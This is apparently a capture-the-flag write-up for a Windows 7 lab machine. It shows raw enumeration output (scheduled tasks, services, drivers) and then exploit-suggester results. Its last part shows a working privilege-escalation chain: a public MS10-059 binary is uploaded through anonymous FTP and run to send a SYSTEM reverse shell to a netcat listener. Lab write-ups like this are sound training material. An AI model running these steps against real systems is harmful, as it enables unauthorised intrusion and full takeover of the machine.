Last Run Time: 18/3/2017 1:08:40
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\wermgr.exe -queuereporting
Start In: N/A
Comment: Windows Error Reporting task to process queued reports.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Windows Filtering Platform
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In: N/A
Comment: This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Windows Media Sharing
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In: N/A
Comment: This task updates the cached list of folders and the security permissions on any new files in a user?s shared media library.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\WindowsBackup
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time: 14/9/2019 10:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In: N/A
Comment: This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 10:00:00
Start Date: 24/3/2017
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\WindowsColorSystem
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:01
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task applies color calibration settings.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:01
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task applies color calibration settings.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows Defender
HostName: DEVEL
TaskName: \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time: 14/9/2019 3:11:42
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In: N/A
Comment: Scheduled Scan
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 3:11:42
Start Date: 1/1/2000
End Date: 1/1/2100
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 264 N/A
csrss.exe 344 N/A
wininit.exe 384 N/A
csrss.exe 396 N/A
winlogon.exe 452 N/A
services.exe 488 N/A
lsass.exe 496 SamSs
lsm.exe 504 N/A
svchost.exe 608 DcomLaunch, PlugPlay, Power
svchost.exe 672 RpcEptMapper, RpcSs
svchost.exe 724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe 792 N/A
svchost.exe 832 AudioEndpointBuilder, CscService, SysMain,
TrkWks, UxSms
svchost.exe 888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
ProfSvc, Schedule, SENS, Themes, Winmgmt,
wuauserv
svchost.exe 1000 EventSystem, netprofm, nsi, sppuinotify,
W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe 1072 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc
spoolsv.exe 1184 Spooler
svchost.exe 1220 BFE, DPS, MpsSvc
svchost.exe 1320 AppHostSvc
svchost.exe 1392 FDResPub
svchost.exe 1424 ftpsvc
VGAuthService.exe 1512 VGAuthService
vmtoolsd.exe 1540 VMTools
svchost.exe 1572 W3SVC, WAS
WmiPrvSE.exe 2020 N/A
msdtc.exe 1632 MSDTC
sppsvc.exe 2696 sppsvc
svchost.exe 2736 WinDefend
SearchIndexer.exe 2816 WSearch
TrustedInstaller.exe 3948 TrustedInstaller
w3wp.exe 2584 N/A
cmd.exe 3928 N/A
conhost.exe 1240 N/A
tasklist.exe 1052 N/A
c:\windows\system32\inetsrv>net start
net start
These Windows services are started:
Application Experience
Application Host Helper Service
Base Filtering Engine
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Function Discovery Resource Publication
Group Policy Client
IP Helper
Microsoft FTP Service
Network List Service
Network Location Awareness
Network Store Interface Service
Offline Files
Plug and Play
Power
Print Spooler
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Software Protection
SPP Notification Service
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
VMware Alias Manager and Ticket Service
VMware Tools
Windows Audio
Windows Audio Endpoint Builder
Windows Defender
Windows Event Log
Windows Firewall
Windows Management Instrumentation
Windows Modules Installer
Windows Process Activation Service
Windows Search
Windows Time
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
World Wide Web Publishing Service
The command completed successfully.
c:\windows\system32\inetsrv> DRIVERQUERY
DRIVERQUERY
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel 14/7/2009 2:51:59
ACPI Microsoft ACPI Driver Kernel 14/7/2009 2:11:11
AcpiPmi ACPI Power Meter Drive Kernel 14/7/2009 2:16:36
adp94xx adp94xx Kernel 6/12/2008 1:59:55
adpahci adpahci Kernel 1/5/2007 8:29:26
adpu320 adpu320 Kernel 28/2/2007 2:03:08
AFD Ancillary Function Dri Kernel 14/7/2009 2:12:34
agp440 Intel AGP Bus Filter Kernel 14/7/2009 2:25:36
aic78xx aic78xx Kernel 12/4/2006 3:20:11
aliide aliide Kernel 14/7/2009 2:11:17
amdagp AMD AGP Bus Filter Dri Kernel 14/7/2009 2:25:36
amdide amdide Kernel 14/7/2009 2:11:19
AmdK8 AMD K8 Processor Drive Kernel 14/7/2009 2:11:03
AmdPPM AMD Processor Driver Kernel 14/7/2009 2:11:03
amdsata amdsata Kernel 19/5/2009 8:54:22
amdsbs amdsbs Kernel 20/3/2009 8:35:26
amdxata amdxata Kernel 19/5/2009 8:57:35
AppID AppID Driver Kernel 14/7/2009 2:36:51
arc arc Kernel 25/5/2007 12:31:06
arcsas arcsas Kernel 14/1/2009 9:26:37
AsyncMac RAS Asynchronous Media Kernel 14/7/2009 2:54:46
atapi IDE Channel Kernel 14/7/2009 2:11:15
b06bdrv Broadcom NetXtreme II Kernel 14/2/2009 12:10:59
b57nd60x Broadcom NetXtreme Gig Kernel 26/4/2009 2:15:34
Beep Beep Kernel 14/7/2009 2:45:00
blbdrive blbdrive Kernel 14/7/2009 2:23:04
bowser Browser Support Driver File System 14/7/2009 2:14:21
BrFiltLo Brother USB Mass-Stora Kernel 7/8/2006 12:33:45
BrFiltUp Brother USB Mass-Stora Kernel 7/8/2006 12:33:45
Brserid Brother MFC Serial Por Kernel 7/8/2006 12:33:50
BrSerWdm Brother WDM Serial dri Kernel 7/8/2006 12:33:44
BrUsbMdm Brother MFC USB Fax On Kernel 7/8/2006 12:33:43
BrUsbSer Brother MFC USB Serial Kernel 9/8/2006 3:02:02
BTHMODEM Bluetooth Serial Commu Kernel 14/7/2009 2:51:34
cdfs CD/DVD File System Rea File System 14/7/2009 2:11:14
cdrom CD-ROM Driver Kernel 14/7/2009 2:11:24
circlass Consumer IR Devices Kernel 14/7/2009 2:51:17
CLFS Common Log (CLFS) Kernel 14/7/2009 2:11:10
CmBatt Microsoft AC Adapter D Kernel 14/7/2009 2:19:18
cmdide cmdide Kernel 14/7/2009 2:11:18
CNG CNG Kernel 14/7/2009 2:32:55
Compbatt Microsoft Composite Ba Kernel 14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel 14/7/2009 2:45:26
crcdisk Crcdisk Filter Driver Kernel 14/7/2009 2:46:05
CSC Offline Files Driver Kernel 14/7/2009 2:15:08
DfsC DFS Namespace Client D File System 14/7/2009 2:14:16
discache System Attribute Cache Kernel 14/7/2009 2:24:04
Disk Disk Driver Kernel 14/7/2009 2:11:28
DXGKrnl LDDM Graphics Subsyste Kernel 14/7/2009 2:26:15
E1G60 Intel(R) PRO/1000 NDIS Kernel 29/5/2008 2:14:11
ebdrv Broadcom NetXtreme II Kernel 31/12/2008 6:06:23
elxstor elxstor Kernel 4/2/2009 12:09:33
ErrDev Microsoft Hardware Err Kernel 14/7/2009 2:19:18
exfat exFAT File System Driv File System 14/7/2009 2:14:01
fastfat FAT12/16/32 File Syste File System 14/7/2009 2:14:01
fdc Floppy Disk Controller Kernel 14/7/2009 2:45:45
FileInfo File Information FS Mi File System 14/7/2009 2:21:51
Filetrace Filetrace File System 14/7/2009 2:15:29
flpydisk Floppy Disk Driver Kernel 14/7/2009 2:45:45
FltMgr FltMgr File System 14/7/2009 2:11:13
FsDepends File System Dependency File System 14/7/2009 2:15:38
fvevol Bitlocker Drive Encryp Kernel 14/7/2009 2:13:01
gagp30kx Microsoft Generic AGPv Kernel 14/7/2009 2:25:42
hcw85cir Hauppauge Consumer Inf Kernel 11/5/2009 10:22:41
HDAudBus Microsoft UAA Bus Driv Kernel 14/7/2009 2:50:55
HidBatt HID UPS Battery Driver Kernel 14/7/2009 2:19:21
HidBth Microsoft Bluetooth HI Kernel 14/7/2009 2:51:33
HidIr Microsoft Infrared HID Kernel 14/7/2009 2:51:04
HidUsb Microsoft HID Class Dr Kernel 14/7/2009 2:51:04
HpSAMD HpSAMD Kernel 19/5/2009 2:42:46
HTTP HTTP Kernel 14/7/2009 2:12:53
hwpolicy Hardware Policy Driver Kernel 14/7/2009 2:11:01
i8042prt i8042 Keyboard and PS/ Kernel 14/7/2009 2:11:23
iaStorV iaStorV Kernel 8/4/2009 7:54:58
iirsp iirsp Kernel 13/12/2005 11:48:01
intelide intelide Kernel 14/7/2009 2:11:19
intelppm Intel Processor Driver Kernel 14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel 14/7/2009 2:54:28
IPMIDRV IPMIDRV Kernel 14/7/2009 2:30:59
IPNAT IP Network Address Tra Kernel 14/7/2009 2:54:28
IRENUM IR Bus Enumerator Kernel 14/7/2009 2:53:27
isapnp isapnp Kernel 14/7/2009 2:19:29
iScsiPrt iScsiPort Driver Kernel 14/7/2009 2:46:21
kbdclass Keyboard Class Driver Kernel 14/7/2009 2:11:15
kbdhid Keyboard HID Driver Kernel 14/7/2009 2:45:09
KSecDD KSecDD Kernel 14/7/2009 2:11:56
KSecPkg KSecPkg Kernel 14/7/2009 2:34:00
lltdio Link-Layer Topology Di Kernel 14/7/2009 2:53:18
LSI_FC LSI_FC Kernel 10/12/2008 12:28:47
LSI_SAS LSI_SAS Kernel 19/5/2009 3:19:55
LSI_SAS2 LSI_SAS2 Kernel 19/5/2009 3:31:29
LSI_SCSI LSI_SCSI Kernel 17/4/2009 1:14:47
luafv UAC File Virtualizatio File System 14/7/2009 2:15:44
megasas megasas Kernel 19/5/2009 4:09:36
MegaSR MegaSR Kernel 19/5/2009 4:25:17
Modem Modem Kernel 14/7/2009 2:55:24
monitor Microsoft Monitor Clas Kernel 14/7/2009 2:25:58
mouclass Mouse Class Driver Kernel 14/7/2009 2:11:15
mouhid Mouse HID Driver Kernel 14/7/2009 2:45:08
mountmgr Mount Point Manager Kernel 14/7/2009 2:11:27
mpio mpio Kernel 14/7/2009 2:46:13
mpsdrv Windows Firewall Autho Kernel 14/7/2009 2:52:52
MRxDAV WebDav Client Redirect File System 14/7/2009 2:14:25
mrxsmb SMB MiniRedirector Wra File System 14/7/2009 2:14:24
mrxsmb10 SMB 1.x MiniRedirector File System 14/7/2009 2:14:34
mrxsmb20 SMB 2.0 MiniRedirector File System 14/7/2009 2:14:29
msahci msahci Kernel 14/7/2009 2:45:50
msdsm msdsm Kernel 14/7/2009 2:46:19
Msfs Msfs File System 14/7/2009 2:11:26
mshidkmdf Pass-through HID to KM Kernel 14/7/2009 2:51:07
msisadrv msisadrv Kernel 14/7/2009 2:11:09
MsRPC MsRPC Kernel 14/7/2009 2:11:59
mssmbios Microsoft System Manag Kernel 14/7/2009 2:19:25
MTConfig Microsoft Input Config Kernel 14/7/2009 2:46:55
Mup Mup File System 14/7/2009 2:14:14
NativeWifiP NativeWiFi Filter Kernel 14/7/2009 2:51:59
NDIS NDIS System Driver Kernel 14/7/2009 2:12:24
NdisCap NDIS Capture LightWeig Kernel 14/7/2009 2:52:44
NdisTapi Remote Access NDIS TAP Kernel 14/7/2009 2:54:24
Ndisuio NDIS Usermode I/O Prot Kernel 14/7/2009 2:53:51
NdisWan Remote Access NDIS WAN Kernel 14/7/2009 2:54:34
NDProxy NDIS Proxy Kernel 14/7/2009 2:54:27
NetBIOS NetBIOS Interface File System 14/7/2009 2:53:54
NetBT NetBT Kernel 14/7/2009 2:12:18
nfrd960 nfrd960 Kernel 7/6/2006 12:12:15
Npfs Npfs File System 14/7/2009 2:11:31
nsiproxy NSI proxy service driv Kernel 14/7/2009 2:12:08
Ntfs Ntfs File System 14/7/2009 2:12:05
Null Null Kernel 14/7/2009 2:11:12
nvraid nvraid Kernel 20/5/2009 9:43:36
nvstor nvstor Kernel 20/5/2009 9:44:09
nv_agp NVIDIA nForce AGP Bus Kernel 14/7/2009 2:25:50
ohci1394 1394 OHCI Compliant Ho Kernel 14/7/2009 2:51:29
Parport Parallel port driver Kernel 14/7/2009 2:45:34
partmgr Partition Manager Kernel 14/7/2009 2:11:35
Parvdm Parvdm Kernel 14/7/2009 2:45:29
pci PCI Bus Driver Kernel 14/7/2009 2:11:16
pciide pciide Kernel 14/7/2009 2:11:19
pcmcia pcmcia Kernel 14/7/2009 2:19:29
pcw Performance Counters f Kernel 14/7/2009 2:11:10
PEAUTH PEAUTH Kernel 14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP) Kernel 14/7/2009 2:54:47
Processor Processor Driver Kernel 14/7/2009 2:11:03
Psched QoS Packet Scheduler Kernel 14/7/2009 2:53:58
pvscsi pvscsi Storage Control Kernel 26/1/2016 1:15:17
ql2300 ql2300 Kernel 23/1/2009 1:28:52
ql40xx ql40xx Kernel 19/5/2009 4:17:31
RasAcd Remote Access Auto Con Kernel 14/7/2009 2:54:40
RasAgileVpn WAN Miniport (IKEv2) Kernel 14/7/2009 2:55:00
Rasl2tp WAN Miniport (L2TP) Kernel 14/7/2009 2:54:33
RasPppoe Remote Access PPPOE Dr Kernel 14/7/2009 2:54:53
RasSstp WAN Miniport (SSTP) Kernel 14/7/2009 2:54:57
rdbss Redirected Buffering S File System 14/7/2009 2:14:26
rdpbus Remote Desktop Device Kernel 14/7/2009 3:02:40
RDPCDD RDPCDD Kernel 14/7/2009 3:01:40
RDPDR Terminal Server Device Kernel 14/7/2009 3:02:56
RDPENCDD RDP Encoder Mirror Dri Kernel 14/7/2009 3:01:39
RDPREFMP Reflector Display Driv Kernel 14/7/2009 3:01:41
RDPWD RDP Winstation Driver Kernel 14/7/2009 3:01:50
rdyboost ReadyBoost Kernel 14/7/2009 2:22:02
rspndr Link-Layer Topology Di Kernel 14/7/2009 2:53:20
s3cap s3cap Kernel 14/7/2009 2:28:46
sbp2port sbp2port Kernel 14/7/2009 2:11:28
scfilter Smart card PnP Class F Kernel 14/7/2009 2:33:50
Serenum Serenum Filter Driver Kernel 14/7/2009 2:45:27
Serial Serial Port Driver Kernel 14/7/2009 2:45:33
sermouse Serial Mouse Driver Kernel 14/7/2009 2:45:08
sffdisk SFF Storage Class Driv Kernel 14/7/2009 2:45:52
sffp_mmc SFF Storage Protocol D Kernel 14/7/2009 2:45:52
sffp_sd SFF Storage Protocol D Kernel 14/7/2009 2:45:51
sfloppy High-Capacity Floppy D Kernel 14/7/2009 2:45:52
sisagp SIS AGP Bus Filter Kernel 14/7/2009 2:25:35
SiSRaid2 SiSRaid2 Kernel 24/9/2008 9:19:45
SiSRaid4 SiSRaid4 Kernel 2/10/2008 12:52:22
Smb Message-oriented TCP/I Kernel 14/7/2009 2:53:39
spldr Security Processor Loa Kernel 11/5/2009 7:13:47
srv Server SMB 1.xxx Drive File System 14/7/2009 2:15:10
srv2 Server SMB 2.xxx Drive File System 14/7/2009 2:14:52
srvnet srvnet File System 14/7/2009 2:14:45
stexstor stexstor Kernel 18/2/2009 1:03:21
storflt Disk Virtual Machine B Kernel 14/7/2009 2:28:44
storvsc storvsc Kernel 14/7/2009 2:28:44
swenum Software Bus Driver Kernel 14/7/2009 2:45:08
Tcpip TCP/IP Protocol Driver Kernel 14/7/2009 2:13:18
TCPIP6 Microsoft IPv6 Protoco Kernel 14/7/2009 2:13:18
tcpipreg TCP/IP Registry Compat Kernel 14/7/2009 2:54:14
TDPIPE TDPIPE Kernel 14/7/2009 3:01:36
TDTCP TDTCP Kernel 14/7/2009 3:01:37
tdx NetIO Legacy TDI Suppo Kernel 14/7/2009 2:12:10
TermDD Terminal Device Driver Kernel 14/7/2009 3:01:35
tssecsrv Remote Desktop Service Kernel 14/7/2009 3:01:50
tunnel Microsoft Tunnel Minip Kernel 14/7/2009 2:54:03
uagp35 Microsoft AGPv3.5 Filt Kernel 14/7/2009 2:25:40
udfs udfs File System 14/7/2009 2:14:09
uliagpkx Uli AGP Bus Filter Kernel 14/7/2009 2:25:47
umbus UMBus Enumerator Drive Kernel 14/7/2009 2:51:38
UmPass Microsoft UMPass Drive Kernel 14/7/2009 2:51:35
usbccgp Microsoft USB Generic Kernel 14/7/2009 2:51:31
usbcir eHome Infrared Receive Kernel 14/7/2009 2:51:18
usbehci Microsoft USB 2.0 Enha Kernel 14/7/2009 2:51:14
usbhub Microsoft USB Standard Kernel 14/7/2009 2:52:06
usbohci Microsoft USB Open Hos Kernel 14/7/2009 2:51:14
usbprint Microsoft USB PRINTER Kernel 14/7/2009 3:17:06
USBSTOR USB Mass Storage Drive Kernel 14/7/2009 2:51:19
usbuhci Microsoft USB Universa Kernel 14/7/2009 2:51:10
vdrvroot Microsoft Virtual Driv Kernel 14/7/2009 2:46:19
vga vga Kernel 14/7/2009 2:25:49
VgaSave VgaSave Kernel 14/7/2009 2:25:50
vhdmp vhdmp Kernel 14/7/2009 2:46:25
viaagp VIA AGP Bus Filter Kernel 14/7/2009 2:25:39
ViaC7 VIA C7 Processor Drive Kernel 14/7/2009 2:11:03
viaide viaide Kernel 14/7/2009 2:11:20
vm3dmp vm3dmp Kernel 14/12/2016 12:32:48
vmbus Virtual Machine Bus Kernel 14/7/2009 2:28:53
VMBusHID VMBusHID Kernel 14/7/2009 2:28:45
vmci VMware VMCI Bus Driver Kernel 4/6/2016 11:06:29
VMMemCtl Memory Control Driver Kernel 5/3/2016 1:15:45
vmmouse VMware Pointing Device Kernel 20/2/2016 1:14:08
volmgr Volume Manager Driver Kernel 14/7/2009 2:11:25
volmgrx Dynamic Volume Manager Kernel 14/7/2009 2:11:41
volsnap Storage volumes Kernel 14/7/2009 2:11:34
vsmraid vsmraid Kernel 31/1/2009 3:13:29
vsock vSockets Virtual Machi Kernel 22/6/2016 11:07:52
vwifibus Virtual WiFi Bus Drive Kernel 14/7/2009 2:52:02
WacomPen Wacom Serial Pen HID D Kernel 14/7/2009 2:46:53
WANARP Remote Access IP ARP D Kernel 14/7/2009 2:55:02
Wanarpv6 Remote Access IPv6 ARP Kernel 14/7/2009 2:55:02
Wd Wd Kernel 14/7/2009 2:11:31
Wdf01000 Kernel Mode Driver Fra Kernel 14/7/2009 2:11:36
WfpLwf WFP Lightweight Filter Kernel 14/7/2009 2:53:51
WIMMount WIMMount File System 14/7/2009 2:17:57
WmiAcpi Microsoft Windows Mana Kernel 14/7/2009 2:19:16
ws2ifsl Windows Socket 2.0 Non Kernel 14/7/2009 2:55:01
WudfPf User Mode Driver Frame Kernel 14/7/2009 2:50:13
c:\windows\system32\inetsrv>
Exploit Suggester
Devel Machine
C:> systeminfo > systeminfo.txt
Kalibox
# ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Working Exploit
MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.
On Kalibox
ftp 10.10.10..5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put MS10-059.exe
Devel Machine
c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444
On Kalibox
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.c:\inetpub\wwwroot>whoami
whoami
nt authority\system